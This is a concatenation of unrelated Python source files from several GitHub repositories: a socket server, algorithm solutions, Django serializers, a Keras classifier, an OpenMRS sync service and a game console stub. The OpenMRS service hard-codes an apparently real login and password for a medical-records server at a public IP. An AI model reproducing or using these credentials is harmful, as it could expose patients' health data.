    message/query failures carry only the ID.

    FIX: uses ``==`` instead of ``is`` for int comparisons, and collapses
    the four duplicated branches (1 and 2 sent identical payloads, as did
    3 and 4).
    """
    if code in (1, 2):
        reply = (1, deviceID, MAC)
    elif code in (3, 4):
        reply = (1, deviceID)
    else:
        return  # unknown code: original sent nothing
    sock.send(str.encode(str(reply)))
#Tells client that operation was successfull
def ACK(code, flag, deviceID, time, count):
    """Send a success reply to the client.

    code 1 = register (flag 1 = newly registered; flag 2 = already
    registered, including the original registration time and pending-mail
    count), code 2 = deregister, code 3 = message stored.

    FIX: uses ``==`` instead of ``is`` for int comparisons, and merges the
    identical code-2/code-3 branches.
    """
    if code == 1 and flag == 1:
        reply = (0, flag, deviceID)
    elif code == 1 and flag == 2:
        reply = (0, flag, deviceID, time, count)
    elif code in (2, 3):
        reply = (0, deviceID)
    else:
        return  # unknown code/flag: original sent nothing
    sock.send(str.encode(str(reply)))
#Server Setup Code
portNumber = 9999 # port number for server TCP socket
s = socket(AF_INET, SOCK_STREAM) # initializing new socket
s.bind(('192.168.56.1', portNumber)) # binding server's IP and desired port number to socket
oldStdout = sys.stdout # save old printing setting
logFile1 = open("Activity2.log","w") # open activity log
logFile2 = open("Error2.log","w") # open error log
sys.stdout = logFile1 # redirect print() output to the activity log
print("Server side activity", "\n")
startTime = time.time() # program start; registration times are relative to this
deviceTable = [] # rows: [deviceID, MAC, IP, port, registerTime]
mailBox = [] # mailBox[i] holds pending [message, time] pairs for deviceTable[i]
s.listen(5) #5 max queued
sock, addr = s.accept() # accepts a single client connection
OPEN = True # set False when the client sends a quit message
# FIX: the original tested 'OPEN is True' and 'data[0] is 1' etc.; identity
# comparison with literals only works via CPython small-int caching and
# raises SyntaxWarning on Python 3.8+.  Use plain truthiness / equality.
while OPEN:
    data = sock.recv(1024) # wait for the next request
    data = bytes.decode(data)
    data = literal_eval(data) # requests are Python-literal tuples; literal_eval (unlike eval) is safe on untrusted text
    if data[0] == 1: # register message
        REGISTER(data[1], data[2] , addr[0] , addr[1])
    elif data[0] == 2: # deregister message
        DEREGISTER(data[1], data[2])
    elif data[0] == 3: # mail message
        MSG( data[1], data[2], data[3], time.time() - startTime )
    elif data[0] == 4: # query message
        QUERY( data[1], data[2] )
    elif data[0] == 5: # quit message
        OPEN = False
        print("Connected device: ", data[1], " is leaving network", "\n")
    else:
        sys.stdout = logFile2 # switches to printing to error log
        print("malform packet detected from IP: ", addr[0])
        sys.stdout = logFile1 # switches back to printing to activity log
sys.stdout = oldStdout # change back to normal printing
logFile1.close() # close activity log file
logFile2.close() # close error log file
| MatthewCookUNR/CPE-401-IoT-Proxy-Network-2017 | IoT Proxy/Server-Side Program.py | Server-Side Program.py | py | 12,597 | python | en | code | 0 | github-code | 13 |
28989810024 | '''
https://leetcode.com/problems/kth-largest-element-in-an-array/
'''
def quickSelect(nums,beg,end):
    """Quickselect: return the k-th largest element of nums[beg:end+1].

    NOTE(review): relies on the module-level global ``k`` (already converted
    to a 0-based index below) instead of taking it as a parameter — confirm
    before reusing this function elsewhere.
    """
    if beg < end:
        p = partition(nums,beg,end)
        if p == k:
            return nums[k]
        elif p < k:
            # pivot settled left of the target index: recurse into the right part
            return quickSelect(nums,p+1,end)
        return quickSelect(nums,beg,p-1)
    # single-element (or empty) range: the answer is already in place
    return nums[k]
def partition(nums, beg, end):
    """Partition nums[beg:end+1] in *descending* order around nums[beg].

    Elements >= the pivot end up on the left, smaller ones on the right;
    returns the pivot's final index.  Mutates nums in place.
    """
    pivot_pos = beg
    pivot = nums[pivot_pos]
    while beg < end:
        # advance the left cursor over elements that belong on the left (>= pivot)
        while beg < len(nums) and nums[beg] >= pivot:
            beg += 1
        # retreat the right cursor over elements that belong on the right (< pivot)
        while nums[end] < pivot:
            end -= 1
        if beg < end:
            nums[end], nums[beg] = nums[beg], nums[end]
    # drop the pivot into its settled slot
    nums[end], nums[pivot_pos] = nums[pivot_pos], nums[end]
    return end
nums = [3,2,3,1,2,4,5,5,6]
k = 4
k = k-1  # convert the 1-based "4th largest" to the 0-based index quickSelect uses
print(quickSelect(nums,0,len(nums)-1))
8488144393 | import datetime
from allauth.account import app_settings as allauth_settings
from allauth.account.adapter import get_adapter
from allauth.utils import email_address_exists
from django.contrib.auth import get_user_model
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Count, Q
from phonenumber_field.serializerfields import PhoneNumberField
from rest_auth.registration.serializers import RegisterSerializer
from rest_auth.serializers import LoginSerializer as DefaultLoginSerializer
from rest_framework import serializers
from rest_framework_simplejwt.serializers import TokenRefreshSerializer as DefaultTokenRefreshSerializer
from rest_framework_simplejwt.tokens import RefreshToken
from movies.models import Movie, Rating, MovieLike
from movies.serializers import MovieTimelineSerializer
from reservations.models import Reservation
from utils.custom_functions import reformat_duration, check_google_oauth_api
from utils.excepts import (
UsernameDuplicateException, TakenEmailException, GoogleUniqueIdDuplicatesException,
UnidentifiedUniqueIdException, LoginFailException, SocialSignUpUsernameFieldException
)
from .models import Profile
Member = get_user_model()
class SignUpSerializer(RegisterSerializer):
    """Registration serializer extending rest-auth's RegisterSerializer with
    the extra member fields this project requires (name, mobile, birth_date)."""
    name = serializers.CharField()
    email = serializers.EmailField()
    mobile = PhoneNumberField()
    birth_date = serializers.DateField()
    def validate_email(self, email):
        """Normalize the email via the allauth adapter and reject taken addresses."""
        email = get_adapter().clean_email(email)
        if allauth_settings.UNIQUE_EMAIL:
            if email and email_address_exists(email):
                raise TakenEmailException
        return email
    def validate_username(self, username):
        """Reject usernames that already belong to a member."""
        try:
            Member.objects.get(username=username)
            raise UsernameDuplicateException
        except ObjectDoesNotExist:
            return username
    def save(self, request):
        """Create and return the new Member with a properly hashed password."""
        self.is_valid()
        validated_data = self.validated_data
        member = Member.objects.create(
            username=validated_data['username'],
            name=validated_data['name'],
            email=validated_data['email'],
            birth_date=validated_data['birth_date'],
            mobile=validated_data['mobile']
        )
        # set_password hashes; the create() above stored no password at all
        member.set_password(validated_data.pop('password1'))
        member.save()
        return member
class SocialSignUpSerializer(SignUpSerializer):
    """Sign-up via Google OAuth: no password fields; the Google unique_id
    doubles as the stored password and must not already be registered."""
    # setting the inherited DRF fields to None removes them from this serializer
    password1, password2 = None, None
    unique_id = serializers.CharField(required=True, write_only=True)
    def validate_unique_id(self, unique_id):
        """Reject Google unique_ids already bound to a member."""
        try:
            Member.objects.get(unique_id=unique_id)
            raise GoogleUniqueIdDuplicatesException
        except ObjectDoesNotExist:
            return unique_id
    def validate(self, data):
        # social accounts must use their email address as their username
        if data['username'] != data['email']:
            raise SocialSignUpUsernameFieldException
        return data
    def save(self, request):
        """Create the member; the Google unique_id is used as the password."""
        self.is_valid()
        validated_data = self.validated_data
        member = Member.objects.create(
            username=validated_data['username'],
            name=validated_data['name'],
            email=validated_data['email'],
            birth_date=validated_data['birth_date'],
            mobile=validated_data['mobile'],
            unique_id=validated_data['unique_id'],
        )
        member.set_password(validated_data['unique_id'])
        member.save()
        return member
class JWTSerializer(serializers.Serializer):
    """Login response payload: a SimpleJWT refresh/access pair plus basic
    member fields.  Expects ``{'user': member}`` as the serialized object."""
    refresh = serializers.SerializerMethodField()
    access = serializers.SerializerMethodField()
    id = serializers.IntegerField(source='user.id')
    username = serializers.CharField(source='user.username')
    name = serializers.CharField(source='user.name')
    email = serializers.EmailField(source='user.email')
    birth_date = serializers.DateField(source='user.birth_date')
    mobile = PhoneNumberField(source='user.mobile')
    @classmethod
    def get_token(cls, user):
        # NOTE: a fresh RefreshToken is minted per call, so get_refresh and
        # get_access below each derive from their own token object.
        return RefreshToken.for_user(user)
    def get_refresh(self, obj):
        return str(self.get_token(obj['user']))
    def get_access(self, obj):
        return str(self.get_token(obj['user']).access_token)
# for Documentation
class CheckUsernameDuplicateSerializer(serializers.Serializer):
    """Request-body schema for the username-duplication check (documentation only)."""
    username = serializers.CharField()
class LoginSerializer(DefaultLoginSerializer):
    """Username/password login: drops the email field and makes username required."""
    email = None
    username = serializers.CharField(required=True)
class SocialLoginSerializer(DefaultLoginSerializer):
    """Google social login: authenticates username/password and additionally
    checks that the supplied Google id-token resolves to the member's stored
    unique_id."""
    email = None
    username = serializers.CharField(required=True)
    google_id_token = serializers.CharField(required=True, write_only=True)
    def validate(self, data):
        username = data['username']
        password = data['password']
        google_id_token = data['google_id_token']
        user = self.authenticate(username=username, password=password)
        if user is None:
            raise LoginFailException
        # verify the id-token with Google and compare the returned unique id
        unique_id = check_google_oauth_api(google_id_token)
        if user.unique_id != unique_id:
            raise UnidentifiedUniqueIdException
        data['user'] = user
        return data
class TokenRefreshResultSerializer(serializers.Serializer):
    """Shape of a token-refresh response: only the new access token."""
    access = serializers.CharField()
class TokenRefreshSerializer(DefaultTokenRefreshSerializer):
    """SimpleJWT refresh serializer whose output is reshaped to {'access': ...}."""
    def to_representation(self, instance):
        return TokenRefreshResultSerializer(instance).data
class ProfileDetailSerializer(serializers.ModelSerializer):
    """Nested profile payload used by MemberDetailSerializer."""
    regions = serializers.SerializerMethodField('get_regions')
    genres = serializers.SerializerMethodField('get_genres')
    class Meta:
        model = Profile
        fields = [
            'id',
            'tier',
            'point',
            'regions',
            'genres',
            'time',
            'is_disabled',
        ]
    def get_regions(self, profile):
        # flatten the related regions to a plain list of names
        return [region.name for region in profile.regions.all()]
    def get_genres(self, profile):
        # flatten the related genres to a plain list of names
        return [genre.name for genre in profile.genres.all()]
class MemberDetailSerializer(serializers.ModelSerializer):
    """Member detail payload: core fields, nested profile, and movie counters."""
    profile = ProfileDetailSerializer()
    reserved_movies_count = serializers.SerializerMethodField('get_reserved_movies_count')
    watched_movies_count = serializers.SerializerMethodField('get_watched_movies_count')
    like_movies_count = serializers.SerializerMethodField('get_like_movies_count')
    rating_movies_count = serializers.SerializerMethodField('get_rating_movies_count')
    class Meta:
        model = Member
        fields = [
            'id',
            'email',
            'name',
            'mobile',
            'birth_date',
            'profile',
            'reserved_movies_count',
            'watched_movies_count',
            'like_movies_count',
            'rating_movies_count',
        ]
    def get_reserved_movies_count(self, member):
        # paid, not-cancelled reservations whose screening is still upcoming
        return Movie.objects.filter(
            schedules__reservations__member=member,
            schedules__reservations__payment__isnull=False,
            schedules__reservations__payment__is_canceled=False,
            schedules__start_time__gt=datetime.datetime.today()
        ).count()
    def get_watched_movies_count(self, member):
        # paid, not-cancelled reservations whose screening has already started
        return Movie.objects.filter(
            schedules__reservations__member=member,
            schedules__reservations__payment__isnull=False,
            schedules__reservations__payment__is_canceled=False,
            schedules__start_time__lte=datetime.datetime.today()
        ).count()
    def get_like_movies_count(self, member):
        # NOTE(review): the two conditions traverse different relations
        # (like_members vs movie_likes) in one filter(); verify the resulting
        # join counts only this member's liked movies as intended.
        return Movie.objects.filter(
            like_members__pk=member.pk,
            movie_likes__liked=True
        ).count()
    def get_rating_movies_count(self, member):
        return Rating.objects.filter(
            member=member
        ).count()
class LikeMoviesSerializer(serializers.ModelSerializer):
    """One entry in the member's liked-movies list: movie summary plus when
    the member liked it."""
    movie_id = serializers.IntegerField(source='movie.id')
    movie_name = serializers.CharField(source='movie.name_kor')
    poster = serializers.ImageField(source='movie.poster')
    grade = serializers.CharField(source='movie.grade')
    acc_favorite = serializers.SerializerMethodField('get_acc_favorite')
    open_date = serializers.DateField(source='movie.open_date', format='%Y-%m-%d')
    running_time = serializers.SerializerMethodField('get_running_time')
    directors = serializers.SerializerMethodField('get_directors')
    genres = serializers.SerializerMethodField('get_genres')
    liked_at = serializers.DateField(format='%Y-%m-%d')
    class Meta:
        model = MovieLike
        fields = [
            'movie_id',
            'movie_name',
            'poster',
            'grade',
            'acc_favorite',
            'open_date',
            'running_time',
            'directors',
            'genres',
            'liked_at',
        ]
    def get_acc_favorite(self, movielike):
        # "Accumulated favorites": the real like count plus an id-derived
        # offset, falling back to +11 when the offset would go negative.
        # NOTE(review): presumably seeded demo/display data — confirm intent.
        likes_count = movielike.movie.movie_likes.filter(liked=True).count()
        result = likes_count + 689 - (movielike.movie.pk * 24)
        return result if result >= 0 else likes_count + 11
    def get_running_time(self, movielike):
        # human-readable duration string (e.g. hours/minutes)
        return reformat_duration(movielike.movie.running_time)
    def get_directors(self, movielike):
        return movielike.movie.directors.values_list('name', flat=True)
    def get_genres(self, movielike):
        return movielike.movie.genres.values_list('name', flat=True)
class WatchedMoviesSerializer(serializers.ModelSerializer):
    """Reservation history entry for a movie the member has already watched.

    Flattens payment, schedule, screen, and theater details onto one object;
    nested movie data comes from MovieTimelineSerializer.
    """
    # NOTE(review): removed four helper methods from the original
    # (get_acc_favorite, get_running_time, get_directors, get_genres) that
    # had no matching declared field and were therefore never invoked.
    payment_id = serializers.IntegerField(source='payment.id')
    reservation_code = serializers.CharField(source='payment.code')
    price = serializers.IntegerField(source='payment.price')
    discount_price = serializers.IntegerField(source='payment.discount_price')
    screen_type = serializers.CharField(source='schedule.screen.screen_type')
    screen_name = serializers.CharField(source='schedule.screen.name')
    seat_grade = serializers.SerializerMethodField('get_seat_grade')
    seat_name = serializers.SerializerMethodField('get_seat_name')
    theater_name = serializers.CharField(source='schedule.screen.theater.name')
    theater_region = serializers.CharField(source='schedule.screen.theater.region.name')
    start_time = serializers.DateTimeField(source='schedule.start_time', format='%Y-%m-%d %H:%M')
    payed_at = serializers.DateTimeField(source='payment.payed_at', format='%Y-%m-%d')
    movie = MovieTimelineSerializer(source='schedule.movie')
    class Meta:
        model = Reservation
        fields = [
            'payment_id',
            'reservation_code',
            'price',
            'discount_price',
            'screen_type',
            'screen_name',
            'seat_grade',
            'seat_name',
            'theater_name',
            'theater_region',
            'start_time',
            'payed_at',
            'movie',
        ]
    def get_seat_grade(self, reservation):
        # per-grade seat counts collapsed into rows of {'adult': n, 'teen': n, ...}
        return reservation.seat_grades.annotate(
            adult=Count('grade', filter=Q(grade='adult')),
            teen=Count('grade', filter=Q(grade='teen')),
            preferential=Count('grade', filter=Q(grade='preferential'))
        ).values('adult', 'teen', 'preferential')
    def get_seat_name(self, reservation):
        return reservation.seats.values_list('name', flat=True)
class RatingMoviesSerializer(serializers.ModelSerializer):
    """One entry in the member's movie-rating history."""
    rating_id = serializers.IntegerField(source='id')
    movie_name = serializers.CharField(source='movie.name_kor')
    poster = serializers.ImageField(source='movie.poster')
    class Meta:
        model = Rating
        fields = [
            'rating_id',
            'movie_name',
            'poster',
            'created_at',
            'score',
            'key_point',
            'comment',
        ]
class ReservedMoviesSerializer(serializers.ModelSerializer):
    """Upcoming-reservation payload: reservation, payment, schedule, seat and
    point-saving details flattened onto one object."""
    reservation_id = serializers.IntegerField(source='id')
    reservation_code = serializers.CharField(source='payment.code')
    price = serializers.IntegerField(source='payment.price')
    discount_price = serializers.IntegerField(source='payment.discount_price')
    movie_name = serializers.CharField(source='schedule.movie.name_kor')
    poster = serializers.ImageField(source='schedule.movie.poster')
    screen_type = serializers.CharField(source='schedule.screen.screen_type')
    screen_name = serializers.CharField(source='schedule.screen.name')
    theater_name = serializers.CharField(source='schedule.screen.theater.name')
    start_time = serializers.DateTimeField(source='schedule.start_time', format='%Y-%m-%d %H:%M')
    payed_at = serializers.DateTimeField(source='payment.payed_at', format='%Y-%m-%d %H:%M')
    payment_id = serializers.IntegerField(source='payment.pk')
    receipt_id = serializers.CharField(source='payment.receipt_id')
    seat_grade = serializers.SerializerMethodField('get_seat_grade')
    seat_name = serializers.SerializerMethodField('get_seat_name')
    saving_point = serializers.SerializerMethodField('get_saving_point')
    class Meta:
        model = Reservation
        fields = [
            'reservation_id',
            'reservation_code',
            'price',
            'discount_price',
            'movie_name',
            'poster',
            'screen_type',
            'screen_name',
            'theater_name',
            'start_time',
            'seat_grade',
            'seat_name',
            'payed_at',
            'payment_id',
            'receipt_id',
            'saving_point',
        ]
    def get_seat_grade(self, reservation):
        # per-grade seat counts collapsed into rows of {'adult': n, 'teen': n, ...}
        return reservation.seat_grades.annotate(
            adult=Count('grade', filter=Q(grade='adult')),
            teen=Count('grade', filter=Q(grade='teen')),
            preferential=Count('grade', filter=Q(grade='preferential'))
        ).values('adult', 'teen', 'preferential')
    def get_seat_name(self, reservation):
        return reservation.seats.values_list('name', flat=True)
    def get_saving_point(self, reservation):
        """Points earned for this reservation: 1% of the net price for 'basic'
        tier members, 2% for everyone else."""
        if reservation.member.profile.tier == 'basic':
            discount_rate = 0.01
        else:
            discount_rate = 0.02
        # Option: drop null=True/blank=True on Payment.discount_price and use
        # default=0 instead, which would make this fallback unnecessary.
        if not reservation.payment.discount_price:
            discount_price = 0
        else:
            discount_price = reservation.payment.discount_price
        return round((reservation.payment.price - discount_price) * discount_rate)
class CanceledReservationMoviesSerializer(serializers.ModelSerializer):
    """Cancelled-reservation history entry: when it was cancelled and the
    amounts that were refunded/voided."""
    reservation_id = serializers.IntegerField(source='id')
    canceled_at = serializers.DateTimeField(source='payment.canceled_at', format='%Y-%m-%d %H:%M')
    movie_name = serializers.CharField(source='schedule.movie.name_kor')
    theater_name = serializers.CharField(source='schedule.screen.theater.name')
    start_time = serializers.DateTimeField(source='schedule.start_time', format='%Y-%m-%d %H:%M')
    canceled_payment = serializers.IntegerField(source='payment.price')
    canceled_discount_price = serializers.IntegerField(source='payment.discount_price')
    class Meta:
        model = Reservation
        fields = [
            'reservation_id',
            'canceled_at',
            'movie_name',
            'theater_name',
            'start_time',
            'canceled_payment',
            'canceled_discount_price',
        ]
| OmegaBox/OmegaBox_Server | app/members/serializers.py | serializers.py | py | 15,939 | python | en | code | 1 | github-code | 13 |
74175598738 | #!/usr/bin/env python3
from common.util import load, test, change_dir, parse_nums
def solve(part, file, lo=0, hi=0):
    """Scan sorted blacklist ranges over [lo, hi].

    part 1: return the lowest value not covered by any range.
    part 2: return the count of uncovered values.
    """
    blocked = sorted(parse_nums(line) for line in load(file))
    allowed = 0
    for start, end in blocked:
        # values strictly between the covered prefix and this range
        gap = start - lo - 1
        if gap > 0:
            if part == 1:
                return lo + 1
            allowed += gap
        lo = max(lo, end)
    return allowed + hi - lo
### THE REST IS TESTS ###
if __name__ == "__main__":
    change_dir(__file__)
    # regression checks against known answers; hi=4294967295 is the 32-bit
    # maximum used by the real puzzle input
    test(3, solve(part=1, hi=9, file='input-test-1'))
    test(19449262, solve(part=1, hi=4294967295, file='input-real'))
    test(2, solve(part=2, hi=9, file='input-test-1'))
    test(119, solve(part=2, hi=4294967295, file='input-real'))
| andrewmacheret/aoc | 2016/python/day20/main.py | main.py | py | 654 | python | en | code | 0 | github-code | 13 |
21308439710 | # my first base fashion-MNIST
import keras
import tensorflow as tf
import numpy as np
from keras.datasets import fashion_mnist
# Seed numpy and TF (TF1-style API) so runs are reproducible.
np.random.seed(1)
tf.set_random_seed(1)
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# Scale pixel values from [0, 255] to [0, 1].
train_images = train_images / 255.0
test_images = test_images / 255.0
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
               'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
model = keras.Sequential([
    keras.layers.Flatten(input_shape=(28, 28)),
    keras.layers.Dense(64, activation=tf.nn.relu),
    # FIX: the output layer must have one unit per class (10, matching
    # class_names), not 64 — with 64 softmax units, 54 outputs can never
    # correspond to any real label.
    keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer='adam',
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])
model.fit(train_images, train_labels, epochs=100)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('Test accuracy:', test_acc)
| guchchcug/fashion-mnisit-base | fashion-MNIST.py | fashion-MNIST.py | py | 937 | python | en | code | 0 | github-code | 13 |
17945600663 | import requests
from datetime import datetime, timedelta, date
from openmrs.models import Paciente, Location, ConsultaClinica
# location_url = 'http://197.218.241.174:8080/openmrs/ws/rest/v1/reportingrest/dataSet/5cd2ea5b-b11f-454b-9b45-7a78ac33eab9'
# inscritos_url = 'http://197.218.241.174:8080/openmrs/ws/rest/v1/reportingrest/dataSet/e386ec30-689b-4e43-b6fc-587bac266ea4'
class PullOpenmrsData:
    """Thin client for the OpenMRS reporting REST API.

    NOTE(security): credentials are hard-coded below; they should be moved
    to settings / environment variables.
    """

    URL_BASE = 'http://197.218.241.174:8080/openmrs/ws/rest/v1/reportingrest/dataSet/'
    _AUTH = ('xavier.nhagumbe', 'Goabtgo1')

    def _fetch_rows(self, uuid, params=None):
        """GET one data set and return its 'rows' list, or None on failure."""
        url = PullOpenmrsData.URL_BASE + uuid
        try:
            response = requests.get(url, params=params, auth=PullOpenmrsData._AUTH)
            return response.json()['rows']
        except requests.exceptions.RequestException as err:
            # Keep the original best-effort behaviour: log and return None.
            print(err)
            return None

    def get_locations(self, uuid):
        """Return location rows for data set *uuid* (None on request failure)."""
        return self._fetch_rows(uuid)

    def get_patients(self, uuid, params: dict):
        """Return patient rows for *uuid* filtered by *params* (None on failure)."""
        return self._fetch_rows(uuid, params)
class AddDataToMiddleware:
    """Pull rows from OpenMRS and upsert them into the local Django models."""
    def add_locations(self):
        """Fetch the locations data set and get-or-create Location rows."""
        data_list = PullOpenmrsData().get_locations(
            '5cd2ea5b-b11f-454b-9b45-7a78ac33eab9')
        print(data_list)
        if data_list is not None:
            for data in data_list:
                location, created = Location.objects.get_or_create(
                    location_id=data['location_id'],
                    codigo=data['codigo'],
                    name=data['NAME'],
                    description=data['description'],
                    state_province=data['state_province'],
                    country=data['country'],
                    parent_location=data['parent_location']
                )
                # get_or_create already persists new rows; this save is a no-op
                # for created rows but kept as-is.
                location.save()
        else:
            print('No records!')
    def add_patient(self):
        """Fetch patients in a fixed date window and get-or-create Paciente rows.

        NOTE(review): endDate is hard-coded to 2021-11-10 — probably should be
        "today"; confirm intended sync window.
        """
        params = {
            'startDate': '1900-01-01',
            'endDate': '2021-11-10'
        }
        patients = PullOpenmrsData().get_patients(
            'e386ec30-689b-4e43-b6fc-587bac266ea4', params)
        print(patients)
        if patients is not None:
            for data in patients:
                paciente, created = Paciente.objects.get_or_create(
                    patient_id=data['patient_uuid'],
                    nid=data['NID'],
                    nome=data['NomeCompleto'],
                    genero=data['gender'],
                    # Assumes data_nascimento is epoch milliseconds, but the
                    # sample payload below shows an ISO date string — TODO confirm.
                    data_nascimento=datetime.fromtimestamp(
                        data['data_nascimento'] / 1e3),
                    telefone=data['telefone'],
                    distrito=data['Distrito'],
                    posto_administrativo=data['PAdministrativo'],
                    localidade=data['Localidade'],
                    bairro=data['Bairro'],
                    ponto_referencia=data['PontoReferencia']
                )
                paciente.save()
        else:
            print('No records!')
# patient_id = models.CharField(max_length=500, primary_key=True)
# nid = models.CharField(max_length=255)
# nome = models.CharField(max_length=255)
# genero = models.CharField(max_length=20)
# data_nascimento = models.DateTimeField()
# telefone = models.CharField(max_length=100, blank=True, null=True)
# profissao = models.CharField(max_length=100, blank=True, null=True)
# livro = models.CharField(max_length=15, blank=True, null=True)
# pagina = models.CharField(max_length=4, blank=True, null=True)
# linha = models.CharField(max_length=4, blank=True, null=True)
# nome_confidente = models.CharField(max_length=255, blank=True, null=True)
# confidente_parentesco = models.CharField(
# max_length=255, blank=True, null=True)
# telefone1_confidente = models.CharField(
# max_length=255, blank=True, null=True)
# telefone2_confidente = models.CharField(
# max_length=255, blank=True, null=True)
# endereco_confidente = models.CharField(
# max_length=500, null=True, blank=True)
# distrito = models.CharField(max_length=100, null=True, blank=True)
# posto_administrativo = models.CharField(
# max_length=100, null=True, blank=True)
# localidade = models.CharField(max_length=100, null=True, blank=True)
# bairro = models.CharField(max_length=100, null=True, blank=True)
# ponto_referencia = models.CharField(max_length=100, null=True, blank=True)
# "valor_estadio": "I",
# "location": "5a04df3e-692f-4cc8-8abe-3807ffd0c5bd",
# "transferido_de": null,
# "data_inscricao_programa": null,
# "gender": "F",
# "PontoReferencia": null,
# "data_aceita": null,
# "dead": false,
# "NomeCompleto": "Joana Alberto Alberto",
# "Distrito": "Chiuta",
# "inscrito_programa": "NAO",
# "death_date": null,
# "PAdministrativo": "Manje",
# "data_abertura": 1612821600000,
# "data_inicio": 1325628000000,
# "data_nascimento": "1999-01-01",
# "data_estadio": 1630274400000,
# "referencia": null,
# "data_transferido_de": null,
# "data_seguimento": 1630274400000,
# "telefone": null,
# "Localidade": "Manje-sede",
# "patient_uuid": "bf3f9bf1-b274-412f-aab6-f691b5a22ce3",
# "patient_id": 9371,
# "Bairro": null,
# "data_diagnostico": null,
# "NID": "0105060801/2008/00012"
| fxavier/echosys | app/openmrs/services/data_service.py | data_service.py | py | 5,540 | python | en | code | 0 | github-code | 13 |
4593694305 | class Solution:
"""
@param nums: A list of integers
@return: An integer indicate the value of maximum difference between two
Subarrays
"""
def maxDiffSubArrays(self, nums):
# write your code here
if len(nums) == 0:
return 0
maxL = [nums[0]] * len(nums)
curMaxL = nums[0]
minL = [nums[0]] * len(nums)
curMinL = nums[0]
maxR = [nums[-1]] * len(nums)
curMaxR = nums[-1]
minR = [nums[-1]] * len(nums)
curMinR = nums[-1]
for i in range(1, len(nums)):
r = len(nums) - 1 - i
curMaxL = max(curMaxL + nums[i], nums[i])
maxL[i] = max(maxL[i - 1], curMaxL)
curMinL = min(curMinL + nums[i], nums[i])
minL[i] = min(minL[i - 1], curMinL)
curMaxR = max(curMaxR + nums[r], nums[r])
maxR[r] = max(maxR[r + 1], curMaxR)
curMinR = min(curMinR + nums[r], nums[r])
minR[r] = min(minR[r + 1], curMinR)
ret = 0
for i in range(len(nums) - 1):
t1 = abs(maxL[i] - minR[i + 1])
t2 = abs(maxR[i + 1] - minL[i])
ret = max(t1, t2, ret)
return ret | ultimate010/codes_and_notes | 45_maximum-subarray-difference/maximum-subarray-difference.py | maximum-subarray-difference.py | py | 1,256 | python | en | code | 0 | github-code | 13 |
4904155281 | ##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# DevConsole for cheats and testing
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# Possible commands TODO :
# ### Dev
# # - dev_gamelog #-// {Bool} #-// Enable/Disable game event log print
# ### Cheats
# # - game_ball_add #-// No param #-// Add a new ball
# # - game_ball_remove #-// No param #-// Remove the last ball
# # - game_reset #-// No param #-// Reset the game
# # - game_ball_retrace #-// {Bool} #-// Enable/Disable Ball raytrace
# # - game_pad_size #-// {Pad id} {Size} #-// Change pad size
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# Functionnalities TODO :
# ### Isolated part
# # - [X] devconsole.py existence
# # - [X] Read input
# # - [X] Treat the input and print result
# # - [X] User command log
# ### Combined with PongPython game
# # - [X] In-game window
# # - [X] Window appearance based on a button press (maybe TAB key)
# # - [X] Typing box
# # - [/] In-game support of all the commands
# # - [ ] Game event log
# # - [CANCELLED] Scrollable log
#____________________________________#
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# CODE BEGIN
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# IMPORT
#
""" DEPRECATED
import sys
"""
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# MACROS
#
SKIP = 0
DEV_GAMELOG = 1
GAME_BALL_ADD = 2
GAME_BALL_REMOVE = 3
GAME_RESET = 4
GAME_BALL_RAYTRACE = 5
GAME_BALL_SIZE = 6
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# GLOBAL
#
""" DEPRECATED
argv = sys.argv
argcount = len(argv)
if argcount > 1:
argcommand = argv[1]
# commandlist = ["dev_gamelog","game_ball_add","game_ball_remove","game_reset","game_ball_raytrace","game_pad_size"]
"""
commandlist = []
commandlist.append(["dev_gamelog","{Bool}","Enable/Disable game event log print"])
commandlist.append(["game_ball_add","No param","Add a new ball"])
commandlist.append(["game_ball_remove","No param","Remove the last ball"])
commandlist.append(["game_reset","No param","Reset the game"])
commandlist.append(["game_ball_raytrace","{Bool}","Enable/Disable Ball raytrace"])
commandlist.append(["game_pad_size","{Pad id} {Size}","Change pad size"])
log = []
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# FUNCTIONS
#
### PRINT
def print_undefined(arg):
    # Report an unknown command, both to stdout and to the session log.
    message = 'Error : command "{0}" does not exist.'.format(arg)
    log.append(message)
    print(message)
def print_wip(arg):
    # Placeholder for commands that are recognised but not implemented yet.
    message = 'Sorry : command "{0}" is not implemented yet.'.format(arg)
    log.append(message)
    print(message)
def print_help():
    # Emit the command table as name / parameters / description columns.
    header = "Available commands :"
    log.append(header)
    print(header)
    for name, params, description in commandlist:
        row = name.ljust(25) + params.ljust(25) + description
        log.append(row)
        print(row)
def print_game_ball_add():
    # Confirmation message for the game_ball_add cheat.
    announcement = "Adding one ball to the game."
    log.append(announcement)
    print(announcement)
### INPUT TREATMENT
def console_input(arg):
    """Parse one console line, print feedback, and return an action code."""
    if arg == "" or arg[0] == " ":
        return SKIP  # ignore blank / padded input
    arg = arg.lower()  # commands are case-insensitive
    if arg == "help":
        print_help()
        return SKIP
    if arg == "game_ball_add":
        print_game_ball_add()
        return GAME_BALL_ADD
    # Commands that are recognised but still stubbed out:
    pending = {
        "dev_gamelog": DEV_GAMELOG,
        "game_ball_remove": GAME_BALL_REMOVE,
        "game_reset": GAME_RESET,
        "game_ball_raytrace": GAME_BALL_RAYTRACE,
        "game_pad_size": GAME_BALL_SIZE,
    }
    if arg in pending:
        print_wip(arg)
        return pending[arg]
    print_undefined(arg)
    return SKIP
### LOG MANAGEMENT
def get_log():
    """Return the shared session log list (live reference, not a copy)."""
    return log
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# MAIN
#
""" PRINT INPUT - DEPRECATED
print(argv)
print(argcount)
print("Command : " + argcommand)
"""
""" DEPRECATED
